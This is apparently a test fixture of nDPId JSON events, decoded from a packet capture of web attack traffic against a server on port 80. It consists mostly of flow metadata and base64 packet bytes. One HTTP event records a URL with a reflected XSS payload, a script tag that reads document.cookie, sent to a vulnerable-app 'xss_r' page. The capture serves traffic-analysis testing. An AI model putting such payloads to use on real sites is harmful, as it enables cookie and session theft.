+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347551495,"flow_last_seen":1499347551495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347551495,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":1499347552737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347552737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0B95AAD4GvfqsEAABwKgKMuQuAFCEqySasT6GM4AQAOUcmQAAAQEICgE7I0QD5PS5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347555255,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347555255,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81HxAAD4G8VOsEAABwKgKMuRIAFCgOPHGAAAAAKACchDBdgAAAgQFtAQCCAoBOyW6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5EiyOWdGoDjxx6AScSCtwQAAAgQFtAQCCAoD5PcvATslugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":3,"flow_last_seen":1499347555256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347555256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01H1AAD4G8VqsEAABwKgKMuRIAFCgOPHHsjlnR4AQAOVMyQAAAQEICgE7JboD5Pcv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347556523,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89uZAAD4GzumsEAABwKgKMuRWAFDF1NARAAAAAKACchC8RAAAAgQFtAQCCAoBOyb3AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":2,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5FYT\/QypxdTQEqAScSCgLAAAAgQFtAQCCAoD5PhsATsm9wEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":3,"flow_last_seen":1499347556524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347556524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09udAAD4GzvCsEAABwKgKMuRWAFDF1NASE\/0MqoAQAOU\/NAAAAQEICgE7JvcD5Phs"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347557789,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347557789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82zBAAD4G6p+sEAABwKgKMuRkAFBn0PMDAAAAAKACchD2DAAAAgQFtAQCCAoBOygzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":2,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5GT+u1l1Z9DzBKAScSChLQAAAgQFtAQCCAoD5PmoATsoMwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":3,"flow_last_seen":1499347557790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347557790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02zFAAD4G6qasEAABwKgKMuRkAFBn0PME\/rtZdoAQAOVANQAAAQEICgE7KDMD5Pmo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347559043,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347559043,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nvhAAD4GJtisEAABwKgKMuRyAFDmPbeUAAAAAKACchCxxwAAAgQFtAQCCAoBOylsAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":2,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5HJJe\/AM5j23laAScSB6VwAAAgQFtAQCCAoD5PriATspbAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":3,"flow_last_seen":1499347559044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347559044,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nvlAAD4GJt+sEAABwKgKMuRyAFDmPbeVSXvwDYAQAOUZXgAAAQEICgE7KW0D5Pri"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347560327,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347560327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRJAAD4GGL6sEAABwKgKMuSAAFBDKIe8AAAAAKACchCDZQAAAgQFtAQCCAoBOyquAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":2,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ICL+5A8QyiHvaAScSBoBAAAAgQFtAQCCAoD5PwjATsqrgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":3,"flow_last_seen":1499347560328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347560328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRNAAD4GGMWsEAABwKgKMuSAAFBDKIe9i\/uQPYAQAOUHDAAAAQEICgE7Kq4D5Pwj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347561622,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347561622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JPRAAD4GoNysEAABwKgKMuSOAFBq0Q8FAAAAAKACchDTIgAAAgQFtAQCCAoBOyvxAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":2,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5I6fc34\/atEPBqAScSC1AgAAAgQFtAQCCAoD5P1nATsr8QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":3,"flow_last_seen":1499347561623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347561623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JPVAAD4GoOOsEAABwKgKMuSOAFBq0Q8Gn3N+QIAQAOVUCgAAAQEICgE7K\/ED5P1n"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347564211,"flow_last_seen":1499347564211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347564211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 